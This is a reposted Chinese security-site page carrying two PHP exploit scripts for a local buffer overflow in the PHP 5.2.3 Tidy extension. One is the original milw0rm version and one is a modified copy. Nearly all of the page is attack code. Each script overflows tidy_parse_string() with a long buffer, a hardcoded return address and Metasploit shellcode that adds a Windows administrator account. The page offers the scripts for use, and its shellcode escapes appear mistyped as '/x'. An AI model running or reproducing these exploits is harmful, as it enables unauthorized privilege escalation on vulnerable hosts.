PHP 5.2.3 Tidy extension Local Buffer Overflow Exp 's

admin
admin
admin
102359
文章
87
评论
2017年5月8日23:00:57评论465 views字数 2930阅读9分46秒阅读模式
摘要

鬼仔注:有两个版本,一个是milw0rm上的版本,另外一个是茄子宝修改的milw0rm上那个版本的,茄子宝说中文版XPSP2+PHP5.2.3测试成功,加一个用户名和密码为rayh4c管理员。

鬼仔注:有两个版本,一个是milw0rm上的版本,另外一个是茄子宝修改的milw0rm上那个版本的,茄子宝说中文版XPSP2+PHP5.2.3测试成功,加一个用户名和密码为rayh4c管理员。

milw0rm上的:

<?php
//PHP 5.2.3 tidy_parse_string() & tidy_repair_string() local
//buffer overflow poc (win)
//rgod
//site: retrogod.altervista.org

//quickly tested on xp sp2, worked both from the cli and on apache
//let's have a look here: http://www.google.com/codesearch?hl=it&q=+tidy_parse_string&sa=N

if (!extension_loaded("tidy")){die("you need Tidy extension loaded!");}

# win32_adduser - PASS=tzu EXITFUNC=thread USER=sun Size=233 Encoder=JmpCallAdditive http://metasploit.com
$scode =
"/xfc/xbb/x0b/xad/x7d/x9a/xeb/x0c/x5e/x56/x31/x1e/xad/x01/xc3/x85".
"/xc0/x75/xf7/xc3/xe8/xef/xff/xff/xff/xf7/x45/x39/x9a/x07/x96/x49".
"/xdf/x3b/x1d/x31/xe5/x3b/x20/x25/x6e/xf4/x3a/x32/x2e/x2a/x3a/xaf".
"/x98/xa1/x08/xa4/x1a/x5b/x41/x7a/x85/x0f/x26/xba/xc2/x48/xe6/xf1".
"/x26/x57/x2a/xee/xcd/x6c/xfe/xd5/x29/xe7/x1b/x9e/x6d/x23/xe5/x4a".
"/xf7/xa0/xe9/xc7/x73/xe9/xed/xd6/x68/x9e/x12/x52/x6f/x4b/xa3/x38".
"/x54/x8f/x77/xf1/x54/xeb/xfc/xb2/x64/x76/xc2/x4b/x89/xf3/x83/xa7".
"/x1a/x73/x18/x15/x97/x1b/x28/x8e/xa1/x50/xa8/xe0/xb2/x66/xa9/x8b".
"/xdb/x5a/xf6/xba/xed/xc2/x5e/x34/xe9/x81/x9f/x3d/x5a/xed/xf0/x0c".
"/xba/x8d/x66/x09/xc5/xc7/x79/x7e/xc5/x30/xe6/xed/x5d/x90/x8c/x95".
"/xf8/xcc/x61/x05/x23/x62/x1b/xbd/x03/x0f/x90/x58/x36/xcf/x25/xd6".
"/xd8/x2f/xbe/x62/x50/x0f/x11/xd2/xde/x0b/x4d/xf2/xf8/xb3/xe3/x9f".
"/x70/x93/x97/x30/x1a/xb2/x0b/xa8/xae/x5b/xa1/x46/x6f/xe2/x2d/xca".
"/x06/x8a/xc4/x67/xad/x20/x76/xfc/x22/xb6/x0b/xdc/xcf/x43/x82/x3c".
"/x1f/xea/x1e/x79/x5f/xec/x9e/x81/x5f";

$EIP="/x8B/x51/x81/x7C"; //0x7C81518B call esp kernel32.dll
$NOP=str_repeat("/x90",12);
$____buff=str_repeat("a",2036).$EIP.$NOP.$scode;
tidy_parse_string(1,$____buff,1);
?>

茄子宝修改过的:

<?php

if (!extension_loaded("tidy")){die("you need Tidy extension loaded!");}

$scode =
"/xfc/xbb/xc7/xc4/x05/xc9/xeb/x0c/x5e/x56/x31/x1e/xad/x01/xc3/x85".
"/xc0/x75/xf7/xc3/xe8/xef/xff/xff/xff/x3b/x2c/x41/xc9/xc3/xad/xc1".
"/x8c/xff/x26/xa9/x0b/x87/x39/xbd/x9f/x38/x22/xca/xff/xe6/x53/x27".
"/xb6/x6d/x67/x3c/x48/x9f/xb9/x82/xd2/xf3/x3e/xc2/x91/x0c/xfe/x09".
"/x54/x13/xc2/x65/x93/x28/x96/x5d/x58/x3b/xf3/x15/x3f/xe7/xfa/xc2".
"/xa6/x6c/xf0/x5f/xac/x2d/x15/x61/x59/x5a/x39/xea/x9c/xb7/xcb/xb0".
"/xba/x43/x0f/x79/x03/x2f/x04/x3a/xb3/x2a/xda/xc3/xbf/xbf/x9b/x3f".
"/x4b/xcf/x07/xed/xc0/x47/x30/x06/xdf/x1c/xc0/x68/xe0/x22/xc1/x03".
"/x89/x1e/x9e/x22/xbc/x3e/x76/xcc/xb8/x3d/xb6/xb5/x68/x29/xc7/xc0".
"/x8d/xf6/x4f/x4d/x73/x82/x9e/x3a/x73/x75/xfd/xa9/xef/x57/x67/x4a".
"/x95/x87/x48/xc9/x75/xa9/xf3/x79/x56/x40/x8f/xe4/xe4/x8a/x1d/x86".
"/x71/xa2/xd5/x2b/xa2/x40/x77/xd5/xca/x90/x14/x05/x24/x99/x9e/x01".
"/x1a/x3f/x39/xaa/x34/x5a/x31/x8a/xa4/xcb/xda/xab/x58/x74/x6f/x43".
"/xd4/x0a/xaf/xda/x72/x87/xc6/xb2/x13/x24/x6d/x39/x85/xbe/xe2/xcf".
"/x36/x1e/x8f/x4e/xc0/x36/x5b/xf2/x12/xe9/xe2/xb0/x16/xf5/xe4/x38".
"/x97/xf5/xe4/x38/x97";

$EIP="/xD8/x69/x83/x7C";
$NOP=str_repeat("/x90",12);
$____buff=str_repeat("a",2036).$EIP.$NOP.$scode;
tidy_parse_string(1,$____buff,1);
?>

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2017年5月8日23:00:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   PHP 5.2.3 Tidy extension Local Buffer Overflow Exp 'shttp://cn-sec.com/archives/49937.html

发表评论

匿名网友 填写信息